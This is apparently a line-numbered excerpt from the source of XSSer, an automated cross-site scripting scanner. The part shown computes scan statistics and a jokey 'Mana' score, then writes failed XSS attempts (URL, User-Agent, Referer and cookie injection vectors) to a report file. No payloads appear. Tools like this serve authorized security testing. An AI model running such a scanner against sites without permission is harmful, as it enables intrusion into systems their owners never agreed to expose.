  3265. self.report("\n" + '-'*50)
  3266. self.report("Total XSS Discovered:", total_discovered)
  3267. self.report('-'*50)
  3268. self.report("Checker:", self.false_positives, "|",
  3269. "Manual:",self.manual_found, "|", "Auto:",
  3270. self.auto_found, "|", "DCP:", self.dcp_found,
  3271. "|", "DOM:", self.dom_found, "|", "Induced:",
  3272. self.httpsr_found, "|" , "XSR:", self.xsr_found,
  3273. "|", "XSA:", self.xsa_found, "|", "COO:",
  3274. self.coo_found)
  3275. self.report('-'*50)
  3276. self.report("False positives:", self.false_positives, "|",
  3277. "Vulnerables:",
  3278. total_discovered - self.false_positives)
  3279. self.report('-'*25)
  3280. # efficiency ranking:
  3281. # algor= vulnerables + false positives - failed * extras
  3282. mana = 0
  3283. if self.hash_found > 3:
  3284. mana = mana + 4500
  3285. if self.hash_found == 1:
  3286. mana = mana + 500
  3287. if self.options.reversecheck:
  3288. mana = mana + 200
  3289. if total_payloads > 100:
  3290. mana = mana + 150
  3291. if not self.options.xsser_gtk:
  3292. mana = mana + 25
  3293. if self.options.discode:
  3294. mana = mana + 100
  3295. if self.options.proxy:
  3296. mana = mana + 100
  3297. if self.options.threads > 9:
  3298. mana = mana + 100
  3299. if self.options.heuristic:
  3300. mana = mana + 100
  3301. if self.options.finalpayload or self.options.finalremote:
  3302. mana = mana + 100
  3303. if self.options.script:
  3304. mana = mana + 100
  3305. if self.options.Cem or self.options.Doo:
  3306. mana = mana + 75
  3307. if self.options.heuristic:
  3308. mana = mana + 50
  3309. if self.options.script and not self.options.fuzz:
  3310. mana = mana + 25
  3311. if self.options.followred and self.options.fli:
  3312. mana = mana + 25
  3313. if self.options.wizard:
  3314. mana = mana + 25
  3315. if self.options.dcp:
  3316. mana = mana + 25
  3317. if self.options.hash:
  3318. mana = mana + 10
  3319. mana = (len(self.hash_found) * mana) + mana -4500
  3320. # enjoy it :)
  3321. self.report("Mana:", mana)
  3322. self.report("")
  3323. c = Curl()
  3324. if not len(self.hash_found) and self.hash_notfound:
  3325. if self.options.hash:
  3326. if self.options.statistics:
  3327. self.report('='*75 + '\n')
  3328. self.report("[Info] Target isn't replying to the input [ --hash ] sent!\n")
  3329. else:
  3330. if self.options.target or self.options.heuristic:
  3331. self.report("")
  3332. if self.options.heuristic:
  3333. pass
  3334. else:
  3335. if self.options.statistics:
  3336. self.report('='*75 + '\n')
  3337. if self.options.fileoutput:
  3338. fout = open("XSSreport.raw", "w") # write better than append
  3339. fout.write("="*75)
  3340. fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
  3341. fout.write("="*75 + "\n\n")
  3342. for h in self.hash_notfound:
  3343. if h[2] == 'heuristic':
  3344. if not h[4]:
  3345. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[3]) + "\n\n[!] Method: " + str(h[2]) + "\n\n[*] Payload: \n\n" + str(h[5]) + "\n\n[!] Status:\n\n FILTERED!\n\n")
  3346. else:
  3347. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[3]) + " ]\n\n[!] Method: " + str(h[2]) + "\n\n[*] Payload: \n\n " + str(h[5]) + "\n\n[!] Status:\n\n FILTERED!\n\n")
  3348. elif h[2] == 'hashing check':
  3349. if not h[4]:
  3350. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[3]) + "\n\n[!] Method: " + str(h[2]) + "\n\n[*] Payload: \n\n" + str(h[5]) + "\n\n[!] Status:\n\n FILTERED!\n\n")
  3351. else:
  3352. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[3]) + " ]\n\n[!] Method: " + str(h[2]) + "\n\n[*] Payload: \n\n " + str(h[5]) + "\n\n[!] Status:\n\n FILTERED!\n\n")
  3353. else:
  3354. if h[4]:
  3355. if h[2] == "XSA":
  3356. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: User-Agent Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n")
  3357. elif h[2] == "XSR":
  3358. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Referer Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n")
  3359. elif h[2] == "COO":
  3360. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Cookie Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n")
  3361. else:
  3362. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + h[1] + "\n\n[!] Status: XSS FAILED!\n\n")
  3363. else:
  3364. if h[2] == "XSA":
  3365. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: User-Agent Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n")
  3366. elif h[2] == "XSR":
  3367. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Referer Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n")
  3368. elif h[2] == "COO":
  3369. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Cookie Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n")
  3370. else:
  3371. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + h[1] + "\n\n[!] Status: XSS FAILED!\n\n")
  3372. fout.write("="*75 + "\n\n")
  3373. fout.close()
  3374. else:
  3375. # some exits and info for some bad situations:
  3376. if len(self.hash_found) + len(self.hash_notfound) == 0 and not Exception:
  3377. self.report("\n[Error] XSSer cannot send any data... maybe -something- is blocking connection(s)!?\n")
  3378. if len(self.hash_found) + len(self.hash_notfound) == 0 and self.options.crawling:
  3379. if self.options.xsser_gtk:
  3380. self.report('='*75)
  3381. self.report("\n[Error] Not any feedback from crawler... Aborting! :(\n")
  3382. self.report('='*75 + '\n')
  3383. # print results to xml file
  3384. if self.options.filexml:
  3385. xml_report_results = xml_reporting(self)
  3386. try:
  3387. xml_report_results.print_xml_results(self.options.filexml)
  3388. except:
  3389. return
  3390. if __name__ == "__main__":
  3391. app = xsser()
  3392. options = app.create_options()
  3393. if options:
  3394. app.set_options(options)
  3395. app.run()
  3396. app.land(True)